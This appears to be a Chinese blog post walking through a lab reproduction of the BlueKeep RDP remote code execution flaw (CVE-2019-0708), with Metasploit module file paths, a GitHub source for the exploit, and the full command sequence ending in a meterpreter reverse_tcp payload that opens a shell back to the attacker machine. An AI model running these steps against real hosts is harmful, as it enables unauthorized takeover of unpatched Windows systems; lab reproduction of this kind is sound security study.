CVE-2019-0708 RCE复现
2024-09-03 10:35:29
漏洞环境
- 192.168.91.136 windows7 6.1.7601
- 192.168.91.151 kali
Windows7 SP1下载链接:
ed2k://|file|cn_windows_7_ultimate_with_sp1_x64_dvd_u_677408.iso|3420557312|B58548681854236C7939003B583A8078|/
复现过程
1、首先升级MSF
apt-get update
apt-get install metasploit-framework
2、导入脚本
然后下载RCE脚本,直接将下载下载的脚本放到对应的目录下
rdp.rb -> /opt/metasploit-framework/embedded/framework/lib/msf/core/exploit/rdp.rb
rdp_scanner.rb -> /opt/metasploit-framework/embedded/framework/modules/auxiliary/scanner/rdp/rdp_scanner.rb
cve_2019_0708_bluekeep.rb -> /opt/metasploit-framework/embedded/framework/modules/auxiliary/scanner/rdp/cve_2019_0708_bluekeep.rb
cve_2019_0708_bluekeep_rce.rb -> /opt/metasploit-framework/embedded/framework/modules/exploits/windows/rdp/cve_2019_0708_bluekeep_rce.rb
下载地址:
https://github.com/NAXG/cve_2019_0708_bluekeep_rce
3、重新加载脚本
msfconsole
reload_all
4、攻击
使用set RHOSTS 受害机IP设置受害机IP
使用set RPORT 受害机PORT设置受害机RDP端口号
使用set target ID数字(可选为0-4)设置受害机机器架构
lhost一般不用设置,payload一定要设置
use exploit/windows/rdp/cve_2019_0708_bluekeep_rce
set lhost 192.168.91.151
set rhost 192.168.91.136
set payload windows/x64/meterpreter/reverse_tcp
set target 1
run
目前这个exp仅适用于 windows7 6.1.7601 windows 2008r2
END
最新文章
- python之计算器(第四天)
- music player界面
- [转载]TFS源代码管理
- 基于SharePoint 2013的论坛解决方案[开源]
- 虚拟化技术比较 PV HVM
- 《我是IT小小鸟》读书笔记
- 【nginx网站性能优化篇(1)】gzip压缩与expire浏览器缓存
- redis 消息队列(发布订阅)、持久化(RDB、AOF)、集群(cluster)
- jsp:setProperty
- 关于wkwebview
- xshell 图形化连接ubuntu
- Luogu3373【模板】线段树2
- BZOJ 3624: [Apio2008]免费道路 [生成树 并查集]
- Eureka源码解读
- MySQL 主主配置
- 用junit对java代码进行测试,需要注意
- 反转链表 Reverse Linked List
- ubuntu 16.04 安装pgadmin3
- composer安装第三方库出现需要认证信息等原因
- [转]C#中Timer使用及解决重入问题
热门文章
- python基础语法_9-1闭包 装饰器补充
- 加密模块hashlib+日志模块logging
- visual studio自动向量化
- Solution -「UR #21」「UOJ #632」挑战最大团
- Solution -「洛谷 P5325」Min_25 筛
- 三、Mybatis多表关联查询应用
- python-利用random模块生成测试数据封装方法总结
- leetcode算法13.罗马数字转整数
- Python 中 base64 编码与解码
- 【剑指 Offer II 001. 整数除法】同leedcode 29.两数相除